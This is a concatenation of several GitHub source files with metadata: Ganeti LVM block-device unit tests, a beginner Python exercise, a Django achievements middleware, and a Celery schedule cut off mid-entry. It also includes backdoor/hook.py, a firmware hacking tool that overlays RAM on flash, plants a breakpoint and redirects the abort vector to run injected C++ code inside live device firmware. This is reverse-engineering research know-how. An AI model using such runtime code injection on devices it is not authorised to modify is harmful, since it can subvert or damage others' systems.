pvlist = [self._GenerateRandomPvInfo(rnd, "disk", "myvg")
for _ in range(0, length)]
std_size = bdev.LogicalVolume._GetStdPvSize(pvlist)
self.assertTrue(compat.all(std_size <= pvi.size for pvi in pvlist))
self.assertTrue(compat.any(std_size > pvi.size * (1 - self._MARGIN)
for pvi in pvlist))
pvlist.append(pvlist[0])
p1_size = bdev.LogicalVolume._GetStdPvSize(pvlist)
self.assertEqual(std_size, p1_size)
def testComputeNumPvs(self):
"""Test cases for bdev.LogicalVolume._ComputeNumPvs()"""
rnd = random.Random(8067)
for _ in range(0, 1000):
pvlist = [self._GenerateRandomPvInfo(rnd, "disk", "myvg")]
lv_size = float(rnd.randint(10 * 100, 1024 * 1024 * 100)) / 100.0
num_pv = bdev.LogicalVolume._ComputeNumPvs(lv_size, pvlist)
std_size = bdev.LogicalVolume._GetStdPvSize(pvlist)
self.assertTrue(num_pv >= 1)
self.assertTrue(num_pv * std_size >= lv_size)
self.assertTrue((num_pv - 1) * std_size < lv_size * (1 + self._EPS))
def testGetEmptyPvNames(self):
"""Test cases for bdev.LogicalVolume._GetEmptyPvNames()"""
rnd = random.Random(21126)
for _ in range(0, 100):
num_pvs = rnd.randint(1, 20)
pvlist = [self._GenerateRandomPvInfo(rnd, "disk%d" % n, "myvg")
for n in range(0, num_pvs)]
for num_req in range(1, num_pvs + 2):
epvs = bdev.LogicalVolume._GetEmptyPvNames(pvlist, num_req)
epvs_set = compat.UniqueFrozenset(epvs)
if len(epvs) > 1:
self.assertEqual(len(epvs), len(epvs_set))
for pvi in pvlist:
if pvi.name in epvs_set:
self.assertEqual(pvi.size, pvi.free)
else:
            # There should be no remaining empty PV when fewer than the
            # requested number of PVs have been returned
self.assertTrue(len(epvs) == num_req or pvi.free != pvi.size)
class TestLogicalVolume(testutils.GanetiTestCase):
"""Tests for bdev.LogicalVolume."""
def setUp(self):
"""Set up test data"""
testutils.GanetiTestCase.setUp(self)
self.volume_name = "31225655-5775-4356-c212-e8b1e137550a.disk0"
self.test_unique_id = ("ganeti", self.volume_name)
self.test_params = {
constants.LDP_STRIPES: 1
}
self.pv_info_return = [objects.LvmPvInfo(name="/dev/sda5", vg_name="xenvg",
size=3500000.00, free=5000000.00,
attributes="wz--n-", lv_list=[])]
self.pv_info_invalid = [objects.LvmPvInfo(name="/dev/s:da5",
vg_name="xenvg",
size=3500000.00, free=5000000.00,
attributes="wz--n-", lv_list=[])]
self.pv_info_no_space = [objects.LvmPvInfo(name="/dev/sda5", vg_name="xenvg",
size=3500000.00, free=0.00,
attributes="wz--n-", lv_list=[])]
def testParseLvInfoLine(self):
"""Tests for LogicalVolume._ParseLvInfoLine."""
broken_lines = [
" toomuch#devpath#-wi-ao#253#3#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096.00#/dev/abc(20)",
" devpath#-wi-a#253#3#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#25.3#3#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#twenty#3#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#253#3.1#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#253#three#4096.00#2#/dev/abc(20)",
" devpath#-wi-ao#253#3#four#2#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096..00#2#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096.00#2.0#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096.00#two#/dev/abc(20)",
" devpath#-wi-ao#253#3#4096.00#2#/dev/abc20",
]
for broken in broken_lines:
self.assertRaises(errors.BlockDeviceError,
bdev.LogicalVolume._ParseLvInfoLine, broken, "#")
# Examples of good lines from "lvs":
#
# /dev/something|-wi-ao|253|3|4096.00|2|/dev/sdb(144),/dev/sdc(0)
# /dev/somethingelse|-wi-a-|253|4|4096.00|1|/dev/sdb(208)
true_out = [
("/dev/path", ("-wi-ao", 253, 3, 4096.00, 2, ["/dev/abc"])),
("/dev/path", ("-wi-a-", 253, 7, 4096.00, 4, ["/dev/abc"])),
("/dev/path", ("-ri-a-", 253, 4, 4.00, 5, ["/dev/abc", "/dev/def"])),
("/dev/path", ("-wc-ao", 15, 18, 4096.00, 32,
["/dev/abc", "/dev/def", "/dev/ghi0"])),
# Physical devices might be missing with thin volumes
("/dev/path", ("twc-ao", 15, 18, 4096.00, 32, [])),
]
for exp in true_out:
for sep in "#;|":
devpath = exp[0]
lvs = exp[1]
pvs = ",".join("%s(%s)" % (d, i * 12) for (i, d) in enumerate(lvs[-1]))
lvs_line = (sep.join((" %s", "%s", "%d", "%d", "%.2f", "%d", "%s")) %
((devpath,) + lvs[0:-1] + (pvs,)))
parsed = bdev.LogicalVolume._ParseLvInfoLine(lvs_line, sep)
self.assertEqual(parsed, exp)
def testGetLvGlobalInfo(self):
"""Tests for LogicalVolume._GetLvGlobalInfo."""
good_lines="/dev/1|-wi-ao|253|3|4096.00|2|/dev/sda(20)\n" \
"/dev/2|-wi-ao|253|3|4096.00|2|/dev/sda(21)\n"
expected_output = {"/dev/1": ("-wi-ao", 253, 3, 4096, 2, ["/dev/sda"]),
"/dev/2": ("-wi-ao", 253, 3, 4096, 2, ["/dev/sda"])}
self.assertEqual({},
bdev.LogicalVolume._GetLvGlobalInfo(
_run_cmd=lambda cmd: _FakeRunCmd(False,
"Fake error msg",
cmd)))
self.assertEqual({},
bdev.LogicalVolume._GetLvGlobalInfo(
_run_cmd=lambda cmd: _FakeRunCmd(True,
"",
cmd)))
self.assertRaises(errors.BlockDeviceError,
bdev.LogicalVolume._GetLvGlobalInfo,
_run_cmd=lambda cmd: _FakeRunCmd(True, "BadStdOut", cmd))
fake_cmd = lambda cmd: _FakeRunCmd(True, good_lines, cmd)
good_res = bdev.LogicalVolume._GetLvGlobalInfo(_run_cmd=fake_cmd)
self.assertEqual(expected_output, good_res)
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testLogicalVolumeImport(self, attach_mock):
"""Tests for bdev.LogicalVolume.Import()"""
# Set up the mock object return value
attach_mock.return_value = True
# Create a fake logical volume
inst = bdev.LogicalVolume(self.test_unique_id, [], 1024, {}, {})
# Desired output command
import_cmd = [constants.DD_CMD,
"of=%s" % inst.dev_path,
"bs=%s" % constants.DD_BLOCK_SIZE,
"oflag=direct", "conv=notrunc"]
self.assertEqual(inst.Import(), import_cmd)
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testLogicalVolumeExport(self, attach_mock):
"""Test for bdev.LogicalVolume.Export()"""
# Set up the mock object return value
attach_mock.return_value = True
# Create a fake logical volume
inst = bdev.LogicalVolume(self.test_unique_id, [], 1024, {}, {})
# Desired output command
export_cmd = [constants.DD_CMD,
"if=%s" % inst.dev_path,
"bs=%s" % constants.DD_BLOCK_SIZE,
"count=%s" % inst.size,
"iflag=direct"]
self.assertEqual(inst.Export(), export_cmd)
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(utils, "RunCmd")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreate(self, attach_mock, run_cmd_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() success"""
attach_mock.return_value = True
# This returns a successful RunCmd result
run_cmd_mock.return_value = _FakeRunCmd(True, "", "")
pv_info_mock.return_value = self.pv_info_return
expect = bdev.LogicalVolume(self.test_unique_id, [], 1024,
self.test_params, {})
got = bdev.LogicalVolume.Create(self.test_unique_id, [], 1024, None,
self.test_params, False, {},
test_kwarg="test")
self.assertEqual(expect, got)
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailurePvsInfoExclStor(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when pv_info is empty and
exclusive storage is enabled
"""
attach_mock.return_value = True
pv_info_mock.return_value = []
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None, {}, True, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailurePvsInfoNoExclStor(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when pv_info is empty and
exclusive storage is disabled
"""
attach_mock.return_value = True
pv_info_mock.return_value = []
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None, {}, False, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailurePvsInvalid(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when pvs_info output is
invalid
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_invalid
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None, {}, False, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailureNoSpindles(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when there are no spindles
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_return
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None,
                      self.test_params, True, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailureNotEnoughSpindles(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when there are not enough
spindles
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_return
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, 0,
self.test_params, True, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailureNotEnoughEmptyPvs(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when there are not enough
empty pvs
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_return
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, 2,
self.test_params, True, {})
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
def testCreateFailureNoFreeSpace(self, attach_mock, pv_info_mock):
"""Test for bdev.LogicalVolume.Create() failure when there is no free space
"""
attach_mock.return_value = True
pv_info_mock.return_value = self.pv_info_no_space
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None,
self.test_params, False, {})
@testutils.patch_object(utils, "RunCmd")
@testutils.patch_object(bdev.LogicalVolume, "GetPVInfo")
@testutils.patch_object(bdev.LogicalVolume, "Attach")
  def testCreateFailureCommand(self, attach_mock, pv_info_mock, run_cmd_mock):
    """Test for bdev.LogicalVolume.Create() failure when the run command fails
    """
    attach_mock.return_value = True
    pv_info_mock.return_value = self.pv_info_return
    run_cmd_mock.return_value = _FakeRunCmd(False, "", "")
self.assertRaises(errors.BlockDeviceError, bdev.LogicalVolume.Create,
self.test_unique_id, [], 1024, None,
self.test_params, False, {})
@testutils.patch_object(bdev.LogicalVolume, "_GetLvGlobalInfo")
def testAttach(self, info_mock):
"""Test for bdev.LogicalVolume.Attach()"""
info_mock.return_value = {"/dev/fake/path": ("v", 1, 0, 1024, 0, ["test"])}
dev = bdev.LogicalVolume.__new__(bdev.LogicalVolume)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), True)
@testutils.patch_object(bdev.LogicalVolume, "_GetLvGlobalInfo")
def testAttachFalse(self, info_mock):
"""Test for bdev.LogicalVolume.Attach() with missing lv_info"""
info_mock.return_value = {}
dev = bdev.LogicalVolume.__new__(bdev.LogicalVolume)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), False)
class TestPersistentBlockDevice(testutils.GanetiTestCase):
"""Tests for bdev.PersistentBlockDevice volumes
"""
def setUp(self):
"""Set up test data"""
testutils.GanetiTestCase.setUp(self)
self.test_unique_id = (constants.BLOCKDEV_DRIVER_MANUAL, "/dev/abc")
def testPersistentBlockDeviceImport(self):
"""Test case for bdev.PersistentBlockDevice.Import()"""
# Create a fake block device
inst = bdev.PersistentBlockDevice(self.test_unique_id, [], 1024, {}, {})
self.assertRaises(errors.BlockDeviceError,
bdev.PersistentBlockDevice.Import, inst)
@testutils.patch_object(bdev.PersistentBlockDevice, "Attach")
def testCreate(self, attach_mock):
"""Test for bdev.PersistentBlockDevice.Create()"""
attach_mock.return_value = True
expect = bdev.PersistentBlockDevice(self.test_unique_id, [], 0, {}, {})
got = bdev.PersistentBlockDevice.Create(self.test_unique_id, [], 1024, None,
{}, False, {}, test_kwarg="test")
self.assertEqual(expect, got)
def testCreateFailure(self):
"""Test for bdev.PersistentBlockDevice.Create() failure"""
self.assertRaises(errors.ProgrammerError, bdev.PersistentBlockDevice.Create,
self.test_unique_id, [], 1024, None, {}, True, {})
@testutils.patch_object(os, "stat")
def testAttach(self, stat_mock):
"""Test for bdev.PersistentBlockDevice.Attach()"""
stat_mock.return_value = FakeStatResult(0x6000) # bitmask for S_ISBLK
dev = bdev.PersistentBlockDevice.__new__(bdev.PersistentBlockDevice)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), True)
@testutils.patch_object(os, "stat")
def testAttachFailureNotBlockdev(self, stat_mock):
"""Test for bdev.PersistentBlockDevice.Attach() failure, not a blockdev"""
stat_mock.return_value = FakeStatResult(0x0)
dev = bdev.PersistentBlockDevice.__new__(bdev.PersistentBlockDevice)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), False)
@testutils.patch_object(os, "stat")
def testAttachFailureNoDevice(self, stat_mock):
"""Test for bdev.PersistentBlockDevice.Attach() failure, no device found"""
stat_mock.side_effect = OSError("No device found")
dev = bdev.PersistentBlockDevice.__new__(bdev.PersistentBlockDevice)
dev.dev_path = "/dev/fake/path"
self.assertEqual(dev.Attach(), False)
if __name__ == "__main__":
testutils.GanetiTestProgram()
| {
"content_hash": "0e2f708c37343179a2d06c14107bf691",
"timestamp": "",
"source": "github",
"line_count": 620,
"max_line_length": 81,
"avg_line_length": 41.248387096774195,
"alnum_prop": 0.6298584499882693,
"repo_name": "leshchevds/ganeti",
"id": "a894e8fd641557ea7572e98f29e6f730e8637be4",
"size": "26962",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/py/ganeti.storage.bdev_unittest.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Haskell",
"bytes": "2664853"
},
{
"name": "JavaScript",
"bytes": "8855"
},
{
"name": "M4",
"bytes": "32087"
},
{
"name": "Makefile",
"bytes": "97737"
},
{
"name": "Python",
"bytes": "6099533"
},
{
"name": "Shell",
"bytes": "122593"
}
],
"symlink_target": ""
} |
cars = 100
space_in_a_car = 4
drivers = 30
passengers = 90
cars_not_driven = cars - drivers
cars_driven = drivers
carpool_capacity = cars_driven * space_in_a_car
average_passengers_per_car = passengers / cars_driven
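# With the numbers above: 70 cars not driven, capacity 120, 3.0 passengers per car.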
print("There are {0} cars available.".format(cars))
print("There are only {0} drivers available.".format(drivers))
print("There will be {0} empty cars today.".format(cars_not_driven))
print("We can transport {0} people today.".format(carpool_capacity))
print("We have {0} to carpool today.".format(carpool_capacity))
print("We have {0} to carpool today.".format(passengers))
| {
"content_hash": "767ebae09c019014b295ece70bbd118a",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 92,
"avg_line_length": 39.25,
"alnum_prop": 0.7372611464968153,
"repo_name": "eilinx/lpthw",
"id": "ca22991f54cd503afa75c65db98b37ca7c0bf451",
"size": "653",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ex4.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24881"
}
],
"symlink_target": ""
} |
__all__ = [ 'overlay_hook' ]
from code import *
from dump import *
from mem import *
includes['hook'] = '#include "hook.h"'
defines['hook_stack_lines'] = 8
defines['hook_show_stack'] = True
defines['hook_show_registers'] = True
defines['hook_show_timestamp'] = True
defines['hook_show_message'] = True
def overlay_hook(d, hook_address, handler,
includes = includes, defines = defines,
handler_address = pad, va = 0x500000, verbose = False,
replace_one_instruction = False, reset = False,
target_already_mapped = False,
show_asm_diff = False
):
"""Inject a C++ hook into Thumb code executing from Flash memory.
All registers are bridged bi-directionally to C++ variables in the hook.
"""
if hook_address & 1:
raise ValueError("Hook address must be halfword aligned")
# Steps to make this crazy thing work:
#
# - Map some movable RAM over the part of flash we're hooking
    # - That RAM has a software interrupt instruction in it
# - We have our own handler in RAM, patched into the vector table
# - That handler cleans up the mess from our hook, and calls C++ code
# - The C++ code accesses its registers via a saved copy on the stack
# - The handler returns, and the hooked code continues on its way.
#
# Actually, we do this in a slightly different order.
#
# - Compile the C++ code first, since we want to report errors quickly
    # - Actually we'll set this all up behind the scenes, then instantly
    #   turn on the overlay mapping. That should make it relatively safe
    #   to use this on live code, which we will be doing.
handler_data = compile_string(handler_address, """{
uint32_t* regs = (uint32_t*) arg;
%s // Alias array to r0-15
uint32_t& ip = r12; // Additional names for r12-r15
uint32_t& sp = r13;
uint32_t& lr = r14;
uint32_t& pc = r15;
uint32_t& cpsr = regs[-1];
{ %s; } // Handler block, with one free semicolon
0; // Unused return value for r0
}""" % (
''.join( 'uint32_t& r%d = regs[%d];\n' % (i,i) for i in range(16) ),
handler
),
# This compile inherits variables and blocks from the shell
includes = includes, defines = defines)
# Reset only after we know the compile is good
if reset:
reset_arm(d)
handler_len = len(handler_data)
poke_words_from_string(d, handler_address, handler_data)
# The hook location doesn't have to be word aligned, but the overlay
# does. So, keep track of where the ovl starts. For simplicity, we
# always make the overlay the same size, 8 bytes.
ovl_address = hook_address & ~3
ovl_size = 8
# That overlay is mostly a copy of the data we're covering up.
# Position the overlay away from flash, so we get a clean copy.
# Then read and disassemble it, starting the disassembly at the hook address.
if not target_already_mapped:
overlay_set(d, va, ovl_size)
ovl_data = read_block(d, ovl_address, ovl_size)
ovl_asm = disassemble_string(ovl_data[hook_address - ovl_address:], address=hook_address)
ovl_asm_lines = disassembly_lines(ovl_asm)
# The next instruction is where we return from the hook.
# Fill the entire instruction we're replacing (2 or 4 bytes)
# with an arbitrary breakpoint we'll use to enter our ISR.
#
# We use a bkpt instead of svc for a subtle but critical
# reason- most of the code here seems to be in svc mode
# already, and this architecture requires software support
# for nesting svc's. Our hook would need to be much bigger
# to include push/pop instructions, yuck.
#
# Right now we use an arbitrary number as the only bkpt code
# and never check this in the handler. This could be used
# to identify one of several hooks in the future.
return_address = ovl_asm_lines[1].address
hook_instruction_size = return_address - hook_address
patched_ovl_data = (
ovl_data[:hook_address - ovl_address] +
b'\xbe' * hook_instruction_size +
ovl_data[return_address - ovl_address:]
)
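    # Illustrative: for a 2-byte Thumb instruction the fill above is the single
    # halfword 0xbebe, which disassembles as "bkpt 0xbe" (the arbitrary bkpt
    # code mentioned above); a 4-byte instruction simply becomes two such halfwords.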
# Our overlay is complete, store it to RAM while it's mapped to our temp VA
if not target_already_mapped:
poke_words(d, va, words_from_string(patched_ovl_data))
# Now back to the instruction we're replacing...
# PC-relative loads are common enough that we try to fix them up. A lot of things
# are too much trouble to relocate, though, and we'll throw up a NotImplementedError.
reloc = ovl_asm_lines[0]
reloc_ldr_word = ldrpc_source_word(d, reloc)
if replace_one_instruction:
# We want to replace one instruction with the C++ function, which it turns
# out is exactly what we do if we omit the relocation entirely.
reloc = ''
elif reloc.op == 'bl':
# Calls are a really special case! We can handle them, but they
# require a different strategy than other instructions. For most
# instructions we use r12 to store the address of our scratchpad
# across stacks, which works fine for thumb code. But calls can invoke
# ARM code that trashes r12, and in fact this is very common because
# of how switch statements are often implemented.
#
# But good news! If this function respects the ARM procedure call
# standard, which the code we have seems to, we can use any of r4-r8
# to save r12 and the called function will preserve it for us.
reloc = """
mov r8, r12
%s
mov r12, r8
""" % reloc
elif reloc_ldr_word is not None:
# Relocate to the assembler's automatic constant pool
reloc.args = reloc.args.split(',')[0] + ', =0x%08x' % reloc_ldr_word
elif reloc.op.startswith('b') and not reloc.op.startswith('bic'):
raise NotImplementedError("Can't hook branches yet: %s" % reloc)
elif reloc.args.find('pc') > 0:
raise NotImplementedError("Can't hook instructions that read or write pc: %s" % reloc)
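    # Illustrative example of the ldr fixup above (address and value made up):
    #   original:  ldr r0, [pc, #28]    @ load from the old literal pool
    #   relocated: ldr r0, =0xdeadbeef  @ same word, from the assembler's own pool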
# The ISR lives just after the handler, in RAM. It includes:
#
# - Register save/restore
# - Invoking the C++ hook function with a nice flat regs[] array
# - A relocated copy of the instruction we replaced with the bkpt
# - Returning to the right address after the hook
isr_address = (handler_address + handler_len + 0x1f) & ~0x1f
isr_len = assemble(d, isr_address, """
@ Save state and lay out the stack:
@
@ [sp, #72+4*13] pc
@ [sp, #72+4*12] r12
@ ... ...
@ [sp, #72+4*1] r1
@ [sp, #72+4*0] r0
@ [sp, #8+4*15] regs[15] / r15 (pc)
@ [sp, #8+4*14] regs[14] / r14 (lr)
@ [sp, #8+4*13] regs[13] / r13 (sp)
@ [sp, #8+4*12] regs[12] / r12
@ ... ...
@ [sp, #8+4*2] regs[ 2] / r2
@ [sp, #8+4*1] regs[ 1] / r1
@ [sp, #8+4*0] regs[ 0] / r0
@ [sp, #4] regs[-1] / cpsr
@ [sp, #0] regs[-2] / breakpoint_psr
@
@ This is a little wasteful of stack RAM, but it makes the layout as
@ convenient as possible for the C++ code by keeping its registers in
@ order.
push {r0-r12, lr} @ Save everything except {sp, pc}
push {r0-r2} @ Placeholders for regs[13] through regs[15]
push {r0-r12} @ Initial value for regs[0] through regs[12]
mrs r11, spsr @ Saved psr, becomes regs[-1]
mrs r10, cpsr @ Also save handler's cpsr to regs[-2]
push {r10-r11} @ (we needed 8-byte alignment anyway)
@ Patch correct values into regs[].
@
@ At this point r0-r12 are fine (assuming we don't care about r8-r12
@ in FIQ mode) and CPSR is fine, but all of r13-r15 need work.
@
@ For r15, there's some vestigial ARM weirdness happening.
@ The hardware always sets lr = faulting_instruction + 4,
@ which would make sense as a return address in 32-bit ARM
@ mode. But with Thumb, now we need to care about the width
@ of the instruction just to calculate a return address.
@
@ But actually, we don't want the return address just yet.
@ The hook should see PC pointing to the breakpoint, then
@ we should advance past that instruction when we execute
@ the relocated code.
        sub r0, lr, #4 @ After the prefetch abort, lr is faulting_instruction+4
str r0, [sp, #8+4*15] @ Store to regs[15]
@ For r13-r14, we need to take a quick trip into the saved processor
@ mode to retrieve them. If we came from user mode, we'll need to use
@ system mode to read the registers so we don't get ourselves stuck.
bic r8, r10, #0xf @ Transfer low 4 mode bits
ands r9, r11, #0xf
orreq r9, r9, #0x1f @ If user mode, switch to system mode
orr r8, r9
msr cpsr_c, r8 @ Quick trip...
mov r4, r13
mov r5, r14
msr cpsr_c, r10 @ Back to the handler's original mode
str r4, [sp, #8+4*13]
str r5, [sp, #8+4*14]
@ Now our regs[] should be consistent with the state the system was in
@ before hitting our breakpoint. Call the C++ handler! (Preserves r8-r13)
add r0, sp, #8 @ r0 = regs[]
adr lr, from_handler @ Long call to C++ handler
ldr r1, =handler_address+1
bx r1
from_handler:
@ The C++ handler may have modified any of regs[-1] through regs[15].
@
@ We need to run the relocated instruction before leaving too.
@ Our approach will be to load as much of this state back into the CPU
@ as we care to, run the relocated instruction, then move the state back
@ where it needs to go so we can return from the ISR.
ldr r11, [sp, #4] @ Refresh r11 from regs[-1]
ldr r0, [sp, #8+4*15] @ Load hook pc from regs[15]
add r0, #hook_instruction_size+1
str r0, [sp, #72+4*13] @ Correct Thumb return address goes in ISR frame
ldr r12, =0xf000000f @ Transfer condition code and mode bits
bic r8, r10, r12 @ Insert into handler cpsr (keep interrupt state)
and r9, r11, r12
tst r9, #0xf @ If low nybble is zero, user mode
orreq r9, r9, #0x1f @ If user mode, switch to system mode
orr r8, r9
ldr r4, [sp, #8+4*13] @ Prepare r13
ldr r5, [sp, #8+4*14] @ Prepare r14
add r12, sp, #8 @ Use r12 to hold regs[] while we're on the user stack
msr cpsr_c, r8 @ Back to the saved mode & condition codes
mov r13, r4 @ Replace saved r13-14 with those from our stack
mov r14, r5
ldm r12, {r0-r11} @ Restore r0-r11 temporarily
%(reloc)s @ Relocated and reassembled code from the hook location
@ We only rely on it preserving pc and r12.
add r12, #4*16 @ When we save, switch from the regs[] copy to the return frame
stm r12, {r0-r11} @ Save r0-r11, capturing modifications
mrs r11, cpsr @ Save cpsr from relocated code
sub r12, #8+4*16 @ Calculate our abort-mode sp from r12
ldr r10, [r12] @ Reload breakpoint_psr from abort-mode stack
msr cpsr_c, r10 @ Back to abort-mode, and to our familiar stack
ldr r1, [sp, #4] @ Load saved cpsr from regs[-1] again
ldr r0, =0xf0000000 @ Mask for condition codes
bic r1, r0
and r0, r11 @ Condition codes from after relocated instruction
orr r0, r1 @ Combine new condition codes with regs[-1]
msr spsr_cxsf, r0 @ Into spsr, ready to restore in ldm below
add sp, #8+4*16 @ Skip back to return frame
ldmfd sp!, {r0-r12, pc}^ @ Return from SVC, and restore cpsr
""" % locals(), defines=locals(), thumb=False)
# Install the ISR, then finally the code overlay. Now our hook is active!
bkpt_prefetch_abort_vector = 0xc
ivt_set(d, bkpt_prefetch_abort_vector, isr_address)
if target_already_mapped:
# We're dealing with a hook target that already has an SRAM mapping,
# instead of completing it by moving the overlay, we complete by
# writing data to the existing mapping.
poke_words(d, ovl_address, words_from_string(patched_ovl_data))
else:
overlay_set(d, ovl_address, ovl_size//4)
# Look at our handiwork in the disassembler
verify_asm = disassemble_context(d, hook_address, size=10)
asm_diff = side_by_side_disassembly(
disassembly_lines(ovl_asm), # Original unpatched hook on the left
disassembly_lines(verify_asm), # Fresh context disassembly on the right
)
if verbose:
print("* Handler compiled to 0x%x bytes, loaded at 0x%x" % (handler_len, handler_address))
print("* ISR assembled to 0x%x bytes, loaded at 0x%x" % (isr_len, isr_address))
print("* Hook at 0x%x, returning to 0x%x" % (hook_address, return_address))
print("* RAM overlay, 0x%x bytes, loaded at 0x%x" % (ovl_size, ovl_address))
if show_asm_diff:
print(asm_diff)
# Most common failure mode I'm seeing now is that the overlay gets stolen or
# the truncation bug just breaks things and the patch doesn't install.
assert verify_asm.find('bkpt') >= 0
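# Illustrative call (device handle, hook address and handler body are made up):
#   overlay_hook(d, 0x1a2c4, "r0 = r1 + 1", verbose=True)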
| {
"content_hash": "6f7b75682f54aceed6e02c9809266715",
"timestamp": "",
"source": "github",
"line_count": 327,
"max_line_length": 103,
"avg_line_length": 43.22935779816514,
"alnum_prop": 0.5870826259196378,
"repo_name": "scanlime/coastermelt",
"id": "e8b1c9b3114612b49883d96b07d8bae4633cb823",
"size": "14223",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "backdoor/hook.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "9476"
},
{
"name": "C",
"bytes": "25287"
},
{
"name": "C++",
"bytes": "46531"
},
{
"name": "Makefile",
"bytes": "2882"
},
{
"name": "Python",
"bytes": "346050"
}
],
"symlink_target": ""
} |
from django.conf import settings
from .models import Achievement
from .utils import check_achievement_plain
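# Illustrative settings entry read by the middleware below (the name comes from
# the code; the value here is made up):
#   ACHIEVEMENT_MIDDLEWARE_REQUEST_METHODS = ["POST", "PUT"]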
class AutoAchievementChecker(object):
def process_response(self, request, response):
        if not getattr(request, 'user', None):
return response
user = request.user
try:
methods = [i.lower() for i in settings.ACHIEVEMENT_MIDDLEWARE_REQUEST_METHODS]
        except Exception:  # the setting may be missing or malformed
methods = []
if request.method.lower() in methods and user and user.is_authenticated():
for obj in Achievement.objects.all().order_by('bonus'):
check_achievement_plain(self, user, obj.key)
return response
| {
"content_hash": "b8b4dfe56983d7844f58be0be2945d02",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 84,
"avg_line_length": 27.130434782608695,
"alnum_prop": 0.7035256410256411,
"repo_name": "ogirardot/django-achievements",
"id": "3aaa3fe0727a54cd3e8d9b3805bdfed6b83e3194",
"size": "625",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "achievements/middleware.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "34856"
},
{
"name": "Shell",
"bytes": "5131"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import os
from datetime import timedelta
from celery import Celery
from celery.schedules import crontab
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'server.settings')
from django.conf import settings # noqa
import logging
logger = logging.getLogger('tasks')
celery_app = Celery('server')
# Using a string here means the worker will not have to
# pickle the object when using Windows.
celery_app.config_from_object('django.conf:settings')
celery_app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
celery_app.conf.update(
    CELERY_ROUTES={
        "proj.tasks.add": {"queue": "hipri"},  # route the add task to the hipri queue
        # specify the queue at call time: add.apply_async((2, 2), queue='hipri')
    },
CELERYBEAT_SCHEDULE={
# "confirm-classes":{
# "task":"app.tasks.autoConfirmClasses",
# "schedule":timedelta(
# seconds=15),
# },
"notify-comment": {
"task": "app.tasks.autoNotifyComment",
"schedule": timedelta(
seconds=15),
},
"remind-classes": {
"task": "app.tasks.autoRemindClasses",
"schedule": timedelta(
seconds=15),
},
"remind-coupons": {
"task": "app.tasks.autoRemindCoupons",
"schedule": timedelta(
seconds=15),
},
"cancel-orders": {
"task": "app.tasks.autoCancelOrders",
"schedule": timedelta(
seconds=15),
},
"add-teaching-age": {
"task": "app.tasks.autoAddTeacherTeachingAge",
